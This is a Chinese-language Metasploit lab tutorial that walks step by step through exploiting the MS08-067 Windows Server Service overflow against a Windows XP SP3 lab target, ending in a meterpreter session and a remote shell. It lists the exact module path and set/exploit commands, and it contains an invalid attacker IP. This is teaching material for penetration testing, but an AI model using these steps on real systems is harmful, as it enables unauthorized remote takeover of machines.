Metasploit漏洞攻擊
Metasploit是一款開源的安全漏洞檢測工具,Metasploit Framework (MSF) 在2003年以開放源碼方式發布,是可以自由獲取的開發框架。它是一個強大的開源平台,供開發,測試和使用惡意代碼,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠平台。這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平台上常見的溢出漏洞和流行的 shellcode ,並且不斷更新。
實驗:通過演示攻擊Windows Server服務RPC請求緩沖區溢出漏洞(MS08-067)漏洞,掌握Metasploit的使用並進行漏洞攻擊。
工具:Metasploit Kali2. windows xp sp3
靶機 IP:192.168.20.16 攻擊機:192.168.20.701.
1.在msfconsole使用search命令搜索MS08067漏洞攻擊程序
從結果中得到
Name : exploit/windows/smb/ms08_067_netapi Disclosure Date:2008-10-28 Rank:great Description:MS08-067 Microsoft Server Service Relative Path Stack Corruption
2.使用use命令調用MS08067漏洞攻擊程序
use exploit/windows/smb/ms08_067_netapi
3.使用show options 命令查看需要設置的選項
4.從圖中可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)
使用 set 命令設置 Module Options,此處需要設置目標IP 即 set RHOST 192.168.20.16
5.使用 set 命令設置后,可再使用show options 命令查看設置情況
6.使用check命令檢查漏洞是否存在
7.設置Exploit target,使用show targets 查看可選項可以看出以下版本的系統均存在此漏洞因為實例演示的XP系統為WinXP SP3 簡體中文版,即
8.使用set target 命令設置目標,此處即為set target 34
9.執行exploit命令后得到一個meterpreter
10.在meterpreter中輸入shell即可進入CMD窗口
漏洞利用完成。實驗結束。